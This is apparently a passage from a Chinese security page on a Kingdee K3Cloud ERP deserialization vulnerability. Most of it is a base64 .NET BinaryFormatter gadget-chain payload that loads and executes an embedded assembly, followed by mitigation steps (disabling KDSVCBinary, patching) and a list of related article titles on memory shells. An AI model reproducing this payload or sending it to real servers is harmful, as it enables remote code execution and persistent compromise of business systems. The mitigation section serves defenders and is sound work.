QAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAMAAAAwDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA8AAAAfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgMAAAAERGF0YQlVbml0eVR5cGUMQXNzZW1ibHlOYW1lAQABCAYhAAAA/gFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGIgAAAE5TeXN0ZW0uQ29yZSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQEAAAAAcAAAAJAwAAAAoJJAAAAAoICAAAAAAKCAgBAAAAAREAAAAPAAAABiUAAAD1AlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQEgAAAAcAAAAJBAAAAAoJKAAAAAoICAAAAAAKCAgBAAAAARMAAAAPAAAABikAAADfA1N5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBQAAAAHAAAACQUAAAAKCSwAAAAKCAgAAAAACggIAQAAAAEVAAAADwAAAAYtAAAA5gJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBYAAAAHAAAACQYAAAAJMAAAAAkxAAAACggIAAAAAAoICAEAAAABFwAAAA8AAAAGMgAAAO8BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQGAAAAAcAAAAJBwAAAAoJNQAAAAoICAAAAAAKCAgBAAAAARkAAAAPAAAABjYAAAApU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5QYWdlZERhdGFTb3VyY2UEAAAABjcAAABNU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EQGgAAAAcAAAAJCAAAAAgIAAAAAAgICgAAAAgBAAgBAAgBAAgIAAAAAAEbAAAADwAAAAY5AAAAKVN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uRGVzaWduZXJWZXJiBAAAAAY6AAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHAAAAAUAAAANAgk7AAAACAgDAAAACQsAAAABHQAAAA8AAAAGPQAAADRTeXN0ZW0uUnVudGltZS5SZW1vdGluZy5DaGFubmVscy5BZ2dyZWdhdGVEaWN0aW9uYXJ5BAAAAAY+AAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAeAAAAAQAAAAkJAAAAEB8AAAACAAAACQoAAAAJCgAAABAgAAAAAgAAAAZBAAAAAAlBAAAABCQAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgIAAAAIRGVsZWdhdGUHbWV0aG9kMAMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcglCAAAACUMAAAABKAAAACQAAAAJRAAAAAlFAAAAASwAAAAkAAAACUYAAAAJRwAAAAEwAAAAJAAAAAlIAAAACUkAAAABMQAAACQAAAAJSgAAAAlLAAAAATUAAAAkAAAACUwAAAAJTQAAAAE7AAAABAAAAAlOAAAACU8AAAAEQgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQZQAAAA1QFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZSAAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5BlMAAAAETG9hZAoEQwAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JUwAAAAk+AAAACVIAAAAGVgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkGVwAAAC5TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKFN5c3RlbS5CeXRlW10pCAAAAAoBRAAAAEIAAAAGWAAAAMwCU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAlSAAAABlsAAAAIR2V0VHlwZXMKAUUAAABDAAAACVsAAAAJPgAAAAlSAAAABl4AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpBl8AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpCAAAAAoBRgAAAEIAAAAGYAAAALYDU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGYgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBmMAAAANR2V0RW51bWVyYXRvcgoBRwAAAEMAAAAJYwAAAAk+AAAACWIAAAAGZgAAAEVTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1N5c3RlbS5UeXBlXSBHZXRFbnVtZXJhdG9yKCkGZwAAAJQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmgAAADAAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkJvb2xlYW4sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGagAAAB5TeXN0ZW0uQ29sbGVjdGlvbnMuSUVudW1lcmF0b3IGawAAAAhNb3ZlTmV4dAoBSQAAAEMAAAAJawAAAAk+AAAACWoAAAAGbgAAABJCb29sZWFuIE1vdmVOZXh0KCkGbwAAABlTeXN0ZW0uQm9vbGVhbiBNb3ZlTmV4dCgpCAAAAAoBSgAAAEIAAAAGcAAAAL0CU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZyAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GcwAAAAtnZXRfQ3VycmVudAoBSwAAAEMAAAAJcwAAAAk+AAAACXIAAAAGdgAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpBncAAAAZU3lzdGVtLlR5cGUgZ2V0X0N1cnJlbnQoKQgAAAAKAUwAAABCAAAABngAAADGAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnoAAAAQU3lzdGVtLkFjdGl2YXRvcgZ7AAAADkNyZWF0ZUluc3RhbmNlCgFNAAAAQwAAAAl7AAAACT4AAAAJegAAAAZ+AAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpBn8AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkIAAAACgFOAAAADwAAAAaAAAAAJlN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uQ29tbWFuZElEBAAAAAk6AAAAEE8AAAACAAAACYIAAAAICAAgAAAEggAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL+wCgyQ8m9wsL

修復建議

一、臨時緩解方案
8.x版本可透過手動新增安全配置並重啟IIS的方式進行緩解，注意管理中心與普通應用配置檔案均需新增：

# 普通應用配置：{WebROOT}\Kingdee\K3Cloud\WebSite\App_Data\Common.config
# 管理中心配置：{WebROOT}\Kingdee\K3Cloud\Services\ManagementService\App_Data\Common.config

EnabledKDSVCBinary = false

由於該漏洞不僅影響管理中心（預設8000埠），也影響普通應用（預設80埠）。如果其它版本透過限制訪問來源臨時緩解漏洞，需要考慮是否會中斷普通使用者Web業務。

二、升級修復方案
1、7.x版本必須先安裝全量補丁（修復程式碼）後安裝臨時補丁（新增安全配置）
2、8.x版本管理中心（預設8000埠）預設不對外開放，且包含修復程式碼。但是直接安裝臨時補丁可能會失敗，所以依舊建議先安裝全量補丁（修復程式碼）後安裝臨時補丁（新增安全配置）。

哥斯拉jsp馬分析
2020-12-27
JS
tomcat記憶體馬
2024-09-02
Tomcat記憶體
深入淺出記憶體馬（一）
2021-07-12
記憶體
Java安全之Spring記憶體馬
2022-01-10
JavaSpring記憶體
Java安全之Weblogic記憶體馬
2021-06-30
JavaWeb記憶體
Tomcat 記憶體馬（一）Listener型
2021-11-05
Tomcat記憶體
Tomcat 記憶體馬（二）Filter型
2021-11-06
Tomcat記憶體Filter
Spring Boot RCE到記憶體馬探索
2022-11-10
Spring Boot記憶體
金蝶ERP系統排名？金蝶ERP辦公系統怎麼選?什麼是使用者口碑最好的金蝶ERP系統？
2022-03-23
【免殺技術】Tomcat記憶體馬-Filter
2022-02-04
Tomcat記憶體Filter
針對Spring MVC的Interceptor記憶體馬
2021-06-07
SpringMVC記憶體
鐵威馬NAS如何使用SSD快取記憶體?
2019-06-06
快取記憶體
記憶體安全週報 | 0824枕戈待旦，秣馬厲兵
2020-08-24
記憶體
Redis記憶體——記憶體消耗(記憶體都去哪了？)
2021-05-20
Redis記憶體
記一次 .NET 某外貿ERP 記憶體暴漲分析
2023-04-23
記憶體
記憶體_大頁記憶體
2016-05-24
記憶體
使用快取記憶體Serde加速Kafka反序列化效能 - Kaszuba
2021-04-23
快取記憶體Kafka
JNI 基礎 - Android 共享記憶體的序列化過程
2018-09-18
Android記憶體
erp 與最新金蝶雲資料同步
2018-11-09
對接金蝶ERP的bi資料視覺化軟體有哪些？
2023-02-15
視覺化
Java安全之基於Tomcat的Filter型記憶體馬
2021-11-21
JavaTomcatFilter記憶體
記憶體管理記憶體管理概述
2020-11-03
記憶體
【記憶體管理】記憶體佈局
2024-06-10
記憶體
記一次 .NET某裝潢ERP系統記憶體暴漲分析
2023-02-27
記憶體
實體記憶體和虛擬記憶體
2007-03-05
記憶體
遊戲記憶體對比普通記憶體區別遊戲記憶體和普通記憶體相差大嗎？
2018-06-23
遊戲記憶體
GPU深度學習效能的三駕馬車：Tensor Core、記憶體頻寬與記憶體層次結構
2023-12-04
GPU深度學習記憶體
Go：記憶體管理與記憶體清理
2020-08-04
Go記憶體
Java的記憶體 -JVM 記憶體管理
2018-08-20
Java記憶體JVM
聊聊記憶體模型與記憶體序
2022-06-16
記憶體模型
記憶體管理篇——實體記憶體的管理
2022-02-23
記憶體
自動共享記憶體管理自動記憶體管理手工記憶體管理
2017-11-20
記憶體
linux記憶體管理（一）實體記憶體的組織和記憶體分配
2024-06-07
Linux記憶體
議題解析與復現--《Java記憶體攻擊技術漫談》（二）無檔案落地Agent型記憶體馬
2021-11-05
Java記憶體
JS中的棧記憶體、堆記憶體
2019-02-23
JS記憶體
Java記憶體區域和記憶體模型
2019-04-08
Java記憶體模型
記憶體溢位和記憶體洩露
2022-11-30
記憶體溢位記憶體洩露
直接記憶體和堆記憶體誰快
2018-05-30
記憶體